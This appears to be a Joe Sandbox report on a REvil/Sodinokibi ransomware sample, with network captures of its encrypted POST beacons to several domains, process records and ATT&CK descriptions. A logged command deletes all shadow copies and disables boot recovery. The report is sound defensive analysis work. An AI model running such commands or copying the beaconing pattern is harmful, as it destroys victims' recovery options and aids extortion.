Nov 17, 2023 00:51:58.145256042 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:58.145282030 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.841075897 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.841151953 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:58.841320992 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:58.842219114 CET	49736	443	192.168.2.4	185.32.57.142
Nov 17, 2023 00:51:58.842236996 CET	443	49736	185.32.57.142	192.168.2.4
Nov 17, 2023 00:51:59.321065903 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.321105957 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:51:59.321181059 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.321819067 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.321835041 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:51:59.659507990 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:51:59.659612894 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.661413908 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.661420107 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:51:59.661819935 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:51:59.663110018 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.663142920 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:51:59.663201094 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:52:00.187021971 CET	443	49737	172.67.219.93	192.168.2.4
Nov 17, 2023 00:52:00.187370062 CET	49737	443	192.168.2.4	172.67.219.93
Nov 17, 2023 00:52:00.356739044 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:00.356787920 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:00.356864929 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:00.357959986 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:00.357975960 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.059654951 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.059771061 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.061978102 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.061983109 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.062393904 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.064049006 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.064104080 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.064109087 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.545346022 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.545562983 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.545664072 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.545840979 CET	49738	443	192.168.2.4	138.197.111.104
Nov 17, 2023 00:52:01.545857906 CET	443	49738	138.197.111.104	192.168.2.4
Nov 17, 2023 00:52:01.903280973 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:01.903331995 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:01.903455019 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:01.904261112 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:01.904275894 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:02.523845911 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:02.523978949 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:02.525501013 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:02.525526047 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:02.525938034 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:02.527440071 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:02.527506113 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:02.527514935 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.323717117 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.323798895 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.323837996 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.323869944 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:03.323890924 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.323908091 CET	49739	443	192.168.2.4	137.74.231.3
Nov 17, 2023 00:52:03.323997974 CET	443	49739	137.74.231.3	192.168.2.4
Nov 17, 2023 00:52:03.324047089 CET	49739	443	192.168.2.4	137.74.231.3

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2023 00:51:24.942881107 CET	57765	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:51:25.112154961 CET	53	57765	1.1.1.1	192.168.2.4
Nov 17, 2023 00:51:56.873395920 CET	63432	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:51:57.458929062 CET	53	63432	1.1.1.1	192.168.2.4
Nov 17, 2023 00:51:58.849507093 CET	63779	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:51:59.152769089 CET	53	63779	1.1.1.1	192.168.2.4
Nov 17, 2023 00:51:59.157489061 CET	55381	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:51:59.319581985 CET	53	55381	1.1.1.1	192.168.2.4
Nov 17, 2023 00:52:00.192445040 CET	63859	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:52:00.354856014 CET	53	63859	1.1.1.1	192.168.2.4
Nov 17, 2023 00:52:01.548077106 CET	54753	53	192.168.2.4	1.1.1.1
Nov 17, 2023 00:52:01.901900053 CET	53	54753	1.1.1.1	192.168.2.4

Timestamp	kBytes transferred	Direction	Data
2023-11-16 23:51:25 UTC	0	OUT	POST /data/image/oe.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 870 Host: p-ride.live
2023-11-16 23:51:25 UTC	0	OUT	Data Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02 Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1\|gx)V,B<
2023-11-16 23:51:56 UTC	1	IN	HTTP/1.1 522 Date: Thu, 16 Nov 2023 23:51:56 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UFhkW%2B60t5x9dP%2F9Lw1EHy0lzTAhZXrKoj7IZJd7ECOFQiX%2FkoaoSkkfhtGYoBYbgwcuKgnDda2jBmtEFzC35UWDtpD7BpGa5xJZFEofOAh5RnoWIpf5NEdBiUF6DA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8273a451bb147208-SEA alt-svc: h3=":443"; ma=86400
2023-11-16 23:51:56 UTC	1	IN	Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Timestamp	kBytes transferred	Direction	Data
2023-11-16 23:51:58 UTC	1	OUT	POST /static/assets/hbhezx.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 870 Host: avtoboss163.ru
2023-11-16 23:51:58 UTC	2	OUT	Data Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02 Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1\|gx)V,B<
2023-11-16 23:51:58 UTC	2	IN	HTTP/1.1 404 Not Found server: nginx date: Thu, 16 Nov 2023 23:51:58 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding x-unique-id: 9C9231A8:A25E_B920398E:01BB_6556AB1D3AB377C082 set-cookie: stats=1; expires=Thu, 23-Nov-2023 23:51:58 GMT; Max-Age=604800; path=/; domain=avtoboss163.ru strict-transport-security: max-age=10 x-reason: no_render vary: Cookie pragma: no-cache last-modified: Thu, 16 Nov 2023 21:49:18 GMT cache-control: must-revalidate, max-age=0 expires: Thu, 16 Nov 2023 21:49:18 GMT x-xss-protection: 1; mode=block connection: close
2023-11-16 23:51:58 UTC	3	IN	Data Raw: 31 38 0d 0a 0a 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 68 31 3e 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 18<h1>404 Not Found<h1>0

Timestamp	kBytes transferred	Direction	Data
2023-11-16 23:51:59 UTC	3	OUT	POST /admin/pics/hdxsmg.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 870 Host: brownswoodblog.com
2023-11-16 23:51:59 UTC	3	OUT	Data Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02 Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1\|gx)V,B<
2023-11-16 23:52:00 UTC	4	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 16 Nov 2023 23:52:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Location: http://brownswoodblog.com/ X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=886MnvvzMILtQsRFlwZYokHPD0RZiLhJC8PCCPNWwjjlPsUJLsdQ9c1Lp1dl%2FlE04fngr9%2FgHUwKymFiTJjp7PRlha5oov9TCzwZafIzDI13ASlBsJLesrq7IVX%2Bn7uYh7f4YRo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8273a5276dfbeba7-SEA alt-svc: h3=":443"; ma=86400
2023-11-16 23:52:00 UTC	5	IN	Data Raw: 39 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 9b<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
2023-11-16 23:52:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-11-16 23:52:01 UTC	5	OUT	POST /admin/graphic/ervzot.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 870 Host: patriotcleaning.net
2023-11-16 23:52:01 UTC	5	OUT	Data Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02 Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1\|gx)V,B<
2023-11-16 23:52:01 UTC	6	IN	HTTP/1.1 404 Not Found Server: nginx/1.21.6 Date: Thu, 16 Nov 2023 23:52:01 GMT Content-Type: text/html Content-Length: 150 Connection: close Vary: Accept-Encoding Set-Cookie: _uid=CgE5FmVWqyE3lQA/JZtvAg==; expires=Fri, 17-Nov-23 23:52:01 GMT; path=/ Strict-Transport-Security: max-age=31536000
2023-11-16 23:52:01 UTC	6	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>

Timestamp	kBytes transferred	Direction	Data
2023-11-16 23:52:02 UTC	7	OUT	POST /news/game/bvprbb.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 870 Host: so-sage.fr
2023-11-16 23:52:02 UTC	7	OUT	Data Raw: 16 4f e1 0b 1d df ba 5d f2 1a d1 04 36 b0 45 11 d8 58 8d 73 76 3a 14 82 2e 8a 0c 1b f1 b5 6e 11 75 ea d0 27 be 58 68 27 21 aa a5 01 78 cd bb 17 b6 be 21 f3 40 0d 6e 23 c1 8b 89 0d 89 3a ca e7 0d b4 55 ab a1 da 95 64 8b f9 6b 43 65 9c 6b 91 05 b1 1d 8a 46 09 6f f5 b3 77 31 00 15 a9 b6 8e a4 a0 10 90 b2 ae ab 37 a2 9e 95 22 7d c3 29 96 59 45 34 c5 94 8a af d2 87 6a a0 a0 59 8e c0 50 2a 1c 1d 58 fb c9 15 7b 10 cd 17 ff a8 e9 c2 e4 63 d1 70 71 19 e6 e4 4c 6c cf 0b 14 e5 f8 38 93 43 45 38 a9 b4 10 49 3b 0a 10 d2 e6 0b 25 b6 c5 8c d8 0b 79 3c c1 0b 6a 64 8e 01 9a 40 bc f4 cc 94 f1 00 21 2d b2 0f 1d 03 46 3e c4 46 b1 25 d0 3e 05 60 11 d9 9f 44 8e e1 f2 4b af ca c5 42 38 50 91 90 58 84 68 8a c6 3d 31 7c bf ed c8 dc ea ee 67 78 8f 8e 29 56 1e 2c 0b 9d 9b 42 3c 02 Data Ascii: O]6EXsv:.nu'Xh'!x!@n#:UdkCekFow17"})YE4jYP*X{cpqLl8CE8I;%y<jd@!-F>F%>`DKB8PXh=1\|gx)V,B<
2023-11-16 23:52:03 UTC	8	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 16 Nov 2023 23:52:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.so-sage.fr/wp-json/>; rel="https://api.w.org/"
2023-11-16 23:52:03 UTC	8	IN	Data Raw: 31 65 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 6f 2d 73 61 67 65 2e 66 72 2f 78 6d 6c 72 70 63 2e 70 68 Data Ascii: 1ea2<!DOCTYPE html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://www.so-sage.fr/xmlrpc.ph

Target ID:	0
Start time:	00:49:56
Start date:	17/11/2023
Path:	C:\Users\user\Desktop\RQzHm5vLxs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\RQzHm5vLxs.exe
Imagebase:	0xd90000
File size:	167'936 bytes
MD5 hash:	CA337C7130EEF4F4FF8E8A4A8EC28647
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown Rule: Windows_Ransomware_Sodinokibi_a282ba44, Description: Identifies SODINOKIBI/REvil ransomware, Source: 00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Target ID:	4
Start time:	00:50:24
Start date:	17/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	00:50:26
Start date:	17/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Execution Coverage:	33.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.9%
Total number of Nodes:	1005
Total number of Limit Nodes:	7

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RQzHm5vLxs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: REvil

Threatname: Sodinokibi

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Spam, unwanted Advertisements and Ransom Demands

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\$WinREAgent\985drm9-readme.txt

C:\$WinREAgent\Scratch\985drm9-readme.txt

C:\985drm9-readme.txt

C:\Program Files (x86)\985drm9-readme.txt

C:\Program Files\985drm9-readme.txt

C:\Recovery\985drm9-readme.txt

C:\Users\985drm9-readme.txt

C:\Users\Default\985drm9-readme.txt

C:\Users\Default\Desktop\985drm9-readme.txt

C:\Users\Default\Documents\985drm9-readme.txt

C:\Users\Default\Downloads\985drm9-readme.txt

C:\Users\Default\Favorites\985drm9-readme.txt

Windows Analysis Report
RQzHm5vLxs.exe

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

